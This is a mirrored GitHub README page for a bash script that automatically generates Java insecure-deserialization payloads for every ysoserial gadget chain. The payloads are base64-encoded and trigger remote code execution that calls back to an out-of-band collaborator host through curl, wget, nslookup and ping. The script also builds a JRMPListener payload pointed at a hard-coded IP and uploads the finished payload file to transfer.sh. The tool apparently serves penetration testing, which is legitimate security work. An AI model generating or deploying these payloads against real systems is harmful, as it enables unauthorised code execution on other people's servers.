Giter VIP home page Giter VIP logo

java-insecure-deserialization's Introduction

java-insecure-deserialization

This script automatically generates all payloads available in Ysoserial https://github.com/frohoff/ysoserial that lead to Remote code execution (RCE), using Out of Band techniques

Note: Payloads that could not be automated. AspectJWeaver, FileUpload1, JSON1, Jython1 and Wicket1

sudo docker run --rm adoptopenjdk/openjdk11 /bin/bash -c '

Collaborator="hufzwo32omf8ss00d9dyayy18sej29qy.oastify.com"
IP="54.77.139.23" # for JRMPListener payload
Encoding="base64 -w0"

export TERM="xterm"
clear
printf "\n\e[1;37m[#]\e[0m Downloading latest ysoserial release \e[1;37m[#]\e[0m\n\n"
curl -LkO https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar && printf "\n\e[1;37m[#]\e[0m Download Completed! \e[1;37m[#]\e[0m\n"
java -jar ysoserial-all.jar >& out
printf "\n\e[1;37m[#]\e[0m Building Payloads (slow) \e[1;37m[#]\e[0m\n"
java -jar ysoserial-all.jar URLDNS "https://URLDNS.$Collaborator/" 2>&- | $Encoding >> payloads.inc
printf "\n" >> payloads.inc
java -jar ysoserial-all.jar C3P0 "https://$Collaborator/:C3P0" 2>&- | $Encoding >> payloads.inc
printf "\n" >> payloads.inc
java -jar ysoserial-all.jar Myfaces2 "https://$Collaborator/:Myfaces2" 2>&- | $Encoding >> payloads.inc
printf "\n" >> payloads.inc
if [ "$IP" != "" ];then
    java -jar ysoserial-all.jar JRMPListener "$IP" 2>&- | $Encoding >> payloads.inc
    printf "\n" >> payloads.inc
fi
for _payload in $(cat out | awk "{print \$1}" | grep -vE "^Y$|Usage:|Available|Sep|INFO:|Payload|-------");do
    java -jar ysoserial-all.jar $_payload "curl curl_$_payload.$Collaborator" 2>&- | $Encoding >> payloads.inc
    printf "\n" >> payloads.inc
    java -jar ysoserial-all.jar $_payload "nslookup nslookup_$_payload.$Collaborator" 2>&- | $Encoding >> payloads.inc
    printf "\n" >> payloads.inc
    java -jar ysoserial-all.jar $_payload "wget wget_$_payload.$Collaborator" 2>&- | $Encoding >> payloads.inc
    printf "\n" >> payloads.inc
    java -jar ysoserial-all.jar $_payload "ping ping_$_payload.$Collaborator" 2>&- | $Encoding >> payloads.inc
    printf "\n" >> payloads.inc
done
file=$(tr -dc 'A-Z0-9' </dev/urandom | head -c 20)
sort -u payloads.inc > $file
printf "\n\n\e[1;37m[+] The payloads have been uploaded [+]\n"
printf "U can download the file through that link: "; curl -Lsk --upload-file $PWD/$file https://transfer.sh/$file
echo
'

java-insecure-deserialization's People

Contributors

nowak0x01 avatar

Stargazers

João Teles avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.